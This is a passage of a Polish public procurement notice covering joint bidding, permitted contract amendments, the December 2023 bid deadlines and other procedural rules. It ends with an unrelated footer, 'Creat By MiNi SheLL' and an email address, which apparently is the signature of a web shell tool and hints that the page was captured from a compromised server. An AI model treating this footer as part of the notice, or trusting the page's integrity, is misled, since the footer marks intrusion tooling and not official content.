załączyć<br/>pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3) Jeżeli oferta Wykonawców ubiegających się wspólnie o zamówienie publiczne zostanie wybrana, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych<br/>Wykonawców.<br/>4) Zamawiający informuje, że przy ocenie spełniania warunków udziału w postępowaniu przez Wykonawców wspólnie<br/>składających ofertę, na podstawie art. 117 ust. 1 ustawy Pzp, Zamawiający przyjmie, że wymagania, o których mowa w pkt<br/>13.1. ppkt c) SWZ mogą być spełnione łącznie przez Wykonawców wspólnie ubiegających się o zamówienie, natomiast<br/>wymagania, o których mowa w pkt 13.1. ppkt d) SWZ muszą być spełnione w pełni przez co najmniej jednego z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty, o których mowa w pkt 14.5. ppkt 1 SWZ zostaną<br/>ocenione pod kątem łącznego spełnienia wymagań Zamawiającego przez występujących wspólnie Wykonawców, z<br/>uwzględnieniem sposobu oceny spełniania warunków udziału w postępowaniu opisanego powyżej.<br/>5) Dokumenty, o których mowa w pkt 14.5 ppkt 2 SWZ, potwierdzające, że Wykonawca nie podlega wykluczeniu, składa<br/>osobno każdy z Wykonawców występujący wspólnie o udzielenie zamówienia;<br/>6) Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy (art. 445 ustawy Pzp);<br/>7) Wszelka korespondencja prowadzona będzie z Wykonawcą występującym jako Pełnomocnik pozostałych (Lider). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość dokonania zmiany Umowy w następujących przypadkach:<br/>1.1. zmiany terminów określonych w Umowie z powodu:<br/>1.1.1. działania siły wyższej (rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do<br/>przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które<br/>uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części) poprzez przedłużenie terminów określonych w<br/>Umowie o okres jej działania oraz okres potrzebny do usunięcia skutków tego działania,<br/>1.1.2. wystąpienia nadzwyczajnych okoliczności (niebędących „siłą wyższą”), grożących rażącą stratą, których Strony<br/>Umowy nie były w stanie przewidzieć mimo zachowania przez Strony należytej staranności poprzez przedłużenie Umowy o<br/>okres ich trwania oraz okres potrzebny do usunięcia skutków spowodowanych wystąpieniem tych nadzwyczajnych<br/>okoliczności,<br/>1.1.3. braku możliwości uzyskania przez Wykonawcę wszystkich informacji, danych lub niezbędnych uzgodnień do<br/>wykonania Umowy, z przyczyn niezawinionych przez Wykonawcę – o okres ich uzyskiwania,<br/>1.1.4. działań podmiotów trzecich uniemożliwiających wykonanie przedmiotu Umowy, które to działania nie są<br/>konsekwencją winy którejkolwiek ze Stron – o okres trwania tych działań,<br/>1.1.5. zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową,<br/>zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w<br/>chwili zawarcia Umowy – o okres trwania tych okoliczności,<br/>1.1.6. zmiany terminu realizacji przedmiotu zamówienia z przyczyn leżących po stronie Zamawiającego;<br/>1.2. zmiany obowiązujących przepisów prawa – w zakresie dostosowującym odpowiednio Umowę do zmienionych<br/>przepisów, w tym nowych wymagań w zakresie sposobu realizacji jakiegokolwiek elementu przedmiotu Umowy, w tym w<br/>szczególności w zakresie podatku VAT;<br/>1.3. w przypadku wystąpienia omyłek pisarskich i rachunkowych – w zakresie sprostowania omyłek, zmian redakcyjnych<br/>oraz zmian będących następstwem zmian danych Stron ujawnionych w rejestrach publicznych.<br/>2. Dopuszcza się możliwość zmiany postanowień Umowy:<br/>2.1. jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą<br/>starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy, a wzrost ceny spowodowany<br/>każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy,<br/>2.2. w przypadkach i na warunkach określonych w ustawie z dnia 2 marca 2020 r. o szczególnych rozwiązaniach<br/>związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi<br/>sytuacji kryzysowych (t. j .Dz. U. z 2023 r., poz. 1327 ze zm.),<br/>2.3. zmiany wysokości wynagrodzenia na zasadach określonych w § 10 Umowy.<br/>3. Dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których<br/>łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, a zmiany te nie powodują<br/>zmiany ogólnego charakteru umowy.<br/>4. Inicjatorem zmian określonych w niniejszym paragrafie może być Zamawiający lub Wykonawca poprzez pisemne<br/>wystąpienie w okresie obowiązywania Umowy zawierające opis proponowanych zmian, ich uzasadnienie oraz termin<br/>wprowadzenia.<br/>5. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-07 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>2. Zamawiający nie przewiduje prowadzenia rozliczeń z Wykonawcą w walutach obcych.<br/>3. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>4. Zamawiający nie przewiduje zastosowania aukcji elektronicznej.<br/>5. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.<br/>6. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Zamawiający jest obowiązany<br/>udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że<br/>wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania<br/>ofert. Jeżeli zamawiający nie udzieli wyjaśnień w terminie, o którym mowa powyżej, przedłuża termin składania ofert o czas<br/>niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami niezbędnymi do należytego<br/>przygotowania i złożenia odpowiednio ofert albo ofert podlegających negocjacjom. Treść zapytań wraz z wyjaśnieniami<br/>zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej prowadzonego postępowania.<br/>7. Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w<br/>ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu znane na tym<br/>etapie) nazwy (firmy) tych podwykonawców.<br/>8. W przypadku złożenia przez Wykonawców dokumentów zawierających dane wyrażone w innych walutach niż PLN,<br/>Zamawiający jako kurs przeliczeniowy waluty, w której oszacowano daną wartość, przyjmie średni kurs Narodowego Banku<br/>Polskiego (NBP) obowiązujący w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>9. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 Ustawy.<br/>Zamawiający nie precyzuje szczególnych wymagań w zakresie zatrudnienia na podstawie stosunku pracy, w<br/>okolicznościach, o których mowa w art. 95 Ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com